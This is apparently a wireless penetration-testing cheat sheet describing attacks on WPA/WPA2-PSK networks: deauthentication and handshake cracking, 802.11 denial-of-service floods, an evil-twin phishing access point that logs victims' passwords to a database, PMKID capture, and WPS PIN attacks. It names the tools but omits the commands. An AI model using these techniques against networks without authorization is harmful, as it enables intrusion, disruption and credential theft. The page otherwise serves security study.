WPA/WPA2 PSK
![](https://mvc1009.gitbook.io/~gitbook/image?url=https%3A%2F%2F3311553654-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MLAAdqT299FDsoc2KjD%252Fuploads%252Fgit-blob-52757f0ec2a184dc7335276c42bfb8eac28c168c%252Fwpa2_psk.png%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=ac78d512&sv=2)
Setup
To restart network services:
Start capturing:
Handshake Capture (Clients needed)
Deauth
Consist on deauthenticate a client in order to capture de re-authentication handshake.
Deauth Global
The same term of deauthentication, but in that case using the brodcast MAC address in order to deauthenticate all clients.
Auth attack or Authentication DoS Mode
Could be sound strange, but if you authenticate 5000 clients to the Access Point is possible to kick out client of the network and then capture their handshake.
Finally the AP will eject the clients with less power rate.
Dissassociation Amok Mode Attack
Same as deauthentication attack but mdk3 gives us the opportunity to introduce allow/deny
lists.
Validating the handshake
Sometimes aircrack-ng
tells us that it capture a handshake when it hasn't. So we can validate it with pyrit
.
Filtering the capture
When we are trying to capture a handshake, maybe we are capturing a lot of packets, so we just need to filter that. (EAPOL -> Handshakes) (wlan.fc.type_subtype==0x08 are Beacons) (wlan.fc.type_subtype==0x05 are Probe Response)
Also it is recommended filtering with the target BSSID.
IF you want to do a doble analysis you may change -Y
parameter to -R "FILTER" -2
Hash extraction
First we need to save our handshaek in HCCAP to after use hccap2john
and crack it.
Cracking the hanshake
Dictionary Attack
Rainbow Table
Airolib + Aircrack
With airolib
we can create a dictionary with PMKS.
Onced created we just need to use aircrack
We can see that the speed of cracking of aircrack-ng
goes from 10k/s up to 200k/s.
Genpmk + (Cowpatty or Pyrit)
First we need to create a new dictionary.
And crackit with Cowpatty:
More faster? try with Pyrit:
You still want to go faster? Try pyrit with Database:
DoS attacks
CTS Frame Attack
The protocol 802.11 is CSMA CA, CA is Collision Avoidance, so in that protocol appear two new types of packets. CTS (Clear to Send) and RTS (Request to Send) that provides to the network the ability to avoid collisions between frames.
What happens if we flood the network with 1000 CTS frames with the time field on his maximum value (30.000 us), if we flood with that TCP stream we will hijack all the bandwidth causing a Denial of Service.
First we need to capture and modify one Clear-to-send frame and modify the Duration to 30.000 us and modify the RA address.
Onced created out evil frame we just need to send several times to the network.
In that case we busy the channel for:
Beacon Flood Mode Attack
The beacon frame is a frame that contains information about the access point such as the channel where the AP is working, ciphers, protocols, etc.
These type of beacons are transmitted in plain as other stations and devices need these frames to extract information in order to connect them.
The idea of Beacon Flood Attack such as his name says, flood a large number of beacons in order to create a lot of ESSID in the same Chanel as the target AP in order to make it invisible for users.
Michael Shutdown Explotation
Can shut down APs using TKIP encryption and QoS Extension with 1 sniffed and 2 injected QoS Data Packets, but less effective.
Evil Twin
One of the most common techniques to obtain the password of a wireless network via phishing. It's common that the devices emit Probe Request frames when their are not associated to any AP. These Probe Request frame ares packets that contain information about which SSID the device was connected before. So we can abuse of that information in order to create a Fake AP with the same SSID.
Creating DHCP file
/etc/dhcpd.conf
Configuring the web page (LOGIN ROUTER WIFI)
Search and copy the html of a login webpage with the following action form:
And the appropriate dbconnect.php
Initializazing services
We need to start apache2 and mysql
Configuring MySQL
As we can see in dbconnect.php
it's trying to connect to a evilTwin
db with fakeap
user, so we just need to configure mysql properly.
Creating the DB
Creating a user for the DB
At this point onced we introduced credentials via the web panel, it will be appended in our database.
Creating the AP
With airbase
we can set up our fake AP without authentication:
Configuring a new network interface
Onced launched our new fake AP, we need to add a new network interface.
Configuring IP tables
The idea is to redirect the traffic coming from victims from at0 to eth0 in order to give them connection to internet.
Syncronize
Finally the last step is syncronize our rules to the fake AP.
Attacks without Clients
In this section we are not going to capture any type of handshake to obtain the hash or key. We are goin to attack the network in a client-less mode.
PKMID Attack
This attack allows us to break the technology using Pairwise Master Key Identifier (PKMID) which is a characteristic available in a lot of devices.
Via Bettercap
The results will be exported on a pcap file.
Via hcxdumptool
Same as bettercap, the results will be exported on a pcap file.
Export results fo hashcat && Cr4ck it!
Using hcxpcaptool
we can easily transform the output of bettercap or hcxdumptool to hashcat.
WPS Attack
Wifi Protected Setup aka WPS is a wireless network security standard that tries to make connections between a router and devices faster and easier.
WPSPinGenerator
is an automatic tool available in Wifislax
.
First we need to choose the interface to work with and the channels where we want to listen. We can see the generic PINS if they are available on the network by selection the suitable SSID.
Finally we just need to test the PIN and wait for success. Noticed that after 3 fail attempts the WPS could lock.
Last updated
Was this helpful?